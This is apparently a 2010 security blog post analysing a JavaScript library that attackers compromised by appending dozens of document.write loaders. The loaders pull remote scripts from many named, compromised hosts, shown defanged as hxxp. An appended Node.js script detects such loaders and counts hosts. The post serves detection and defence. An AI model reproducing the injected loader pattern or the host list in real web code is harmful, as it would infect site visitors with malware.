Hackers Understand the Value of Backups
Hackers keep finding new tricks to obfuscate their malicious code and sneak it into benign websites. The trend keeps growing because websites are now the weakest link in the malware chain: the attacker finds a vulnerability in a website, exploits it to inject malicious code, and voila, a "trusted" website is at his disposal. Plenty of web surfers will drop by and, in turn, be infected with his code. This vicious cycle has become a very attractive modus operandi for the dark figures of the Internet.
Overview
This post shows an example of a trend we first blogged about a few months ago: the way hackers use "backup sources" to infect visitors to a compromised website. If this does not make sense yet, hold on for just a few seconds more.
Quite recently we blogged about how hackers are using benign, useful JavaScript hosted locally on accounts managed by the website owner or admin to spread malware. They inject malicious code right into useful JavaScript snippets which do everything from displaying menu buttons and drop-down choices to much more. Take a look at our previous findings: here.
An Example
Every day we find websites infected with malicious code that follows the same principles. In fact, we now monitor over 1 million websites!
Website name: ipac-bd.org
Time of latest scan: 15:33:10 PDT on 2010/05/03
In this example, the website was hosting a JavaScript library that had been compromised by a hacker (the benign portion of the excerpt below appears to be the tail of the script.aculo.us dragdrop.js file). The hacker had appended a run of script-loading elements at the very end of the benign JavaScript used by the website. The website owner likely never saw this coming, and probably did not realize what was going on until the site was blacklisted.
The “Backup” Strategy
Take a look at the example below: the hacker clearly used multiple websites he had already compromised as "loading points" for the malicious payload injected into the benign JavaScript. It is almost funny when one realizes how many websites this hacker has lined up as backups for his malicious code.
In this example the hacker used 30 different infected websites to try to load his malicious code (the excerpt reproduced below shows 29 distinct hosts). The frequency distribution of the infected websites used to distribute the malware is presented below. Hackers, it seems, understand the concept of a backup strategy well: if one compromised host is cleaned up or taken down, the remaining document.write calls still fetch the payload from the others. An interesting point to probe further would be why the frequency distribution of the infected sites looks the way it does.

Frequency distribution of infected websites used in the transmission of malware.
Example Code
    element.style.top    = top + 'px';
    element.style.left   = left + 'px';
    element.style.height = element._originalHeight;
    element.style.width  = element._originalWidth;
  }
}

// Safari returns margins on body which is incorrect if the child is absolutely
// positioned. For performance reasons, redefine Position.cumulativeOffset for
// KHTML/WebKit only.
if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {
  Position.cumulativeOffset = function(element) {
    var valueT = 0, valueL = 0;
    do {
      valueT += element.offsetTop  || 0;
      valueL += element.offsetLeft || 0;
      if (element.offsetParent == document.body)
        if (Element.getStyle(element, 'position') == 'absolute') break;
      element = element.offsetParent;
    } while (element);
    return [valueL, valueT];
  }
}
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://1-2-3security.com/images/products_housing.php ></script>');
document.write('<script src=hxxp://devinjarvis.com/modlogan/index.php ></script>');
document.write('<script src=hxxp://forumonly5.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
document.write('<script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php ></script>');
document.write('<script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php ></script>');
document.write('<script src=hxxp://precilub.com/lang/favicon.php ></script>');
document.write('<script src=hxxp://potaz.truelife.com/files/SQLyogTunnelz.php ></script>');
document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php ></script>');
document.write('<script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php ></script>');
document.write('<script src=hxxp://foot-jobss.co.cc/wp-includes/wp-config-sample.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://almos-agroliga.ru/agroaddress/woodwork.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://jakojonevar.webphoto.ir/photos/restoreg.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
document.write('<script src=hxxp://pracemladaboleslav.cz/wp-admin/license.php ></script>');
document.write('<script src=hxxp://travelgenerators.com/Images/Dubai.php ></script>');
document.write('<script src=hxxp://allocinema.net/wp-admin/wp-commentsrss2.php ></script>');
document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
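As an added example (not code from the original post), the following Node.js script scans a JavaScript file for the kind of appended document.write loaders shown in the listing above and computes the per-host frequency distribution discussed under "The Backup Strategy". The sample input is constructed inline in the same shape as the listing; the hosts are defanged with hxxp exactly as above, and the regular expression accepts both hxxp and http/https.

```javascript
// Added example (not code from the original post): scan a JavaScript file
// for appended document.write('<script src=...>') loaders like those in the
// listing above, and compute the per-host frequency distribution the post
// discusses. Node.js, no network access; the input is constructed inline.
'use strict';

// Matches document.write('<script src=hxxp://host/path ></script>') as well
// as the live http/https form. "hxxp" is the defanged spelling used above.
const LOADER_RE =
  /document\.write\(\s*['"]<script\b[^>]*?\bsrc=["']?(h(?:tt|xx)ps?:\/\/[^\s"'>]+)/gi;

// Constructed sample: the tail of a benign library followed by injected
// loaders, in the same shape as the compromised file above.
const SAMPLE_JS = `
if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {
  Position.cumulativeOffset = function(element) { return [0, 0]; };
}
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://1-2-3security.com/images/products_housing.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
`;

// Host part of a loader URL: scheme stripped, path dropped, lower-cased.
function hostOf(url) {
  return url.replace(/^h(?:tt|xx)ps?:\/\//i, '').split('/')[0].toLowerCase();
}

// Every injected loader in the file, with its 1-based line number.
function extractLoaders(js) {
  const found = [];
  for (const m of js.matchAll(LOADER_RE)) {
    const line = js.slice(0, m.index).split('\n').length;
    found.push({ line, url: m[1], host: hostOf(m[1]) });
  }
  return found;
}

// [host, count] pairs, most frequent first, ties broken alphabetically.
function hostFrequency(loaders) {
  const counts = new Map();
  for (const l of loaders) counts.set(l.host, (counts.get(l.host) || 0) + 1);
  return [...counts].sort((a, b) => b[1] - a[1] || a[0].localeCompare(b[0]));
}

// True when the last non-blank line of the file is a loader: the tell-tale
// of code appended after a library's natural end, as in the listing above.
function loadersAppendedToTail(js) {
  const lines = js.split('\n').map((s) => s.trim()).filter(Boolean);
  const last = lines[lines.length - 1] || '';
  return new RegExp(LOADER_RE.source, 'i').test(last);
}

// One report per scanned file.
function scanFile(js) {
  const loaders = extractLoaders(js);
  const distribution = hostFrequency(loaders);
  return {
    injectedCount: loaders.length,
    distinctHosts: distribution.length,
    distribution,
    appendedToTail: loadersAppendedToTail(js),
    firstInjectedLine: loaders.length ? loaders[0].line : null,
  };
}

console.log(JSON.stringify(scanFile(SAMPLE_JS), null, 2));
```

Run it with node and it prints the report for the constructed sample; point extractLoaders at the real file contents to get the host distribution the figure above visualizes. The indicator worth alerting on is not the library code itself but a run of document.write loaders after the library's final closing brace, which is why the scan flags files whose last non-blank line is a loader. Because document.write inserts these script elements at parse time, a Content-Security-Policy of script-src 'self' on the hosting site would have stopped the browser from fetching any of the third-party loaders even though the compromised file itself is served first-party; that is a mitigation, not a substitute for restoring the file from a known-good copy and closing the hole used to modify it.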